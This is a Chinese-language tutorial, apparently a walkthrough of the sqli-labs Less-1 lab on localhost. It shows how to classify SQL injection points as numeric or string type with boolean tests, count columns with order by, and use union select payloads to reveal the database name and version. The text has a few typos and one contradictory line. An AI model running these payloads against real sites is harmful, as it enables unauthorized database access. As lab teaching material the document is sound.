判断注入点的类型

通常 Sql 注入漏洞分为 2 种类型：

• 数字型
• 字符型

数字型测试

在参数后面加上单引号,比如: http://xxx/abc.php?id=1' 如果页面返回错误，则存在 Sql 注入。
原因是无论字符型还是整型都会因为单引号个数不匹配而报错。
如果未报错，不代表不存在 Sql 注入，因为有可能页面对单引号做了过滤，这时可以使用判断语句进行注入

数字型判断：
当输入的参 x 为整型时，通常 abc.php 中 Sql 语句类型大致如下：

select * from <表名> where id = x

这种类型可以使用经典的 and 1=1 和 and 1=2 来判断：

Url 地址中输入 http://xxx/abc.php?id= x and 1=1 页面依旧运行正常，继续进行下一步。
Url 地址中继续输入 http://xxx/abc.php?id= x and 1=2 页面运行错误，则说明此 Sql 注入为数字型注入。
原因如下：

当输入 and 1=1时，后台执行 Sql 语句：select * from <表名> where id = x and 1=1 没有语法错误且逻辑判断为正确，所以返回正常。
当输入 and 1=2时，后台执行 Sql 语句：select * from <表名> where id = x and 1=2 没有语法错误但是逻辑判断为假，所以返回错误。
我们再使用假设法：如果这是字符型注入的话，我们输入以上语句之后应该出现如下情况：
select * from <表名> where id = 'x and 1=1'
select * from <表名> where id = 'x and 1=2'
查询语句将 and 语句全部转换为了字符串，并没有进行 and 的逻辑判断，所以不会出现以上结果，故假设是不成立的。

字符型判断：
当输入的参 x 为字符型时，通常 abc.php 中 SQL 语句类型大致如下：select * from <表名> where id = 'x'这种类型我们同样可以使用 and ‘1’='1 和 and ‘1’='2来判断：

Url 地址中输入 http://xxx/abc.php?id= x' and '1'='1 页面运行正常，继续进行下一步。
Url 地址中继续输入 http://xxx/abc.php?id= x' and '1'='2 页面运行错误，则说明此 Sql 注入为字符型注入。
原因如下：

当输入 and ‘1’='1时，后台执行 Sql 语句：select * from <表名> where id = 'x' and '1'='1'语法正确，逻辑判断正确，所以返回正确。
当输入 and ‘1’='2时，后台执行 Sql 语句：select * from <表名> where id = 'x' and '1'='2'语法正确，但逻辑判断错误，所以返回正确。

输入

http://127.0.0.1/sqli/Less-1/?id=1 and 1=1

 

未报错

输入

http://127.0.0.1/sqli/Less-1/?id=1 and 1=2

也为报错则说明非数字型注入

字符型测试

输入

http://127.0.0.1/sqli/Less-1/?id=1' and '1'='1

未报错

输入

http://127.0.0.1/sqli/Less-1/?id=1' and '1'='2

 报错

证明注入类型为字符型

判断字符数

rder by 查询字段个数，逐级增加order by 后面的数字，直到报错。这里是order by到第4个字段时报错，所以证明有3个字段。

 

使用联合查询  确定显示位置 

输入

http://127.0.0.1/sqlilabsphp7/Less-1/?id=1' union select 1,2,3  -- +

查询语句前面正确输出前面的前面不正确判断后面的是否正确并输出

查询数据库名

输入

http://127.0.0.1/sqlilabsphp7/Less-1/?id=-1' union select 1,database(),version()   -- +